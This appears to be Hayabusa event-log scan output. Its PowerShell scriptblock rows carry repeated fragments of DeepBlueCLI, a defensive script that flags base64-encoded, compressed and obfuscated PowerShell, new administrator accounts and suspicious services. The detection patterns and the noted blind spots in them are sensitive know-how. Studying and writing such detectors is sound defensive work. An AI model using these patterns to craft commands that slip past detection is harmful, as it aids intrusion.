$pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:49:18.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
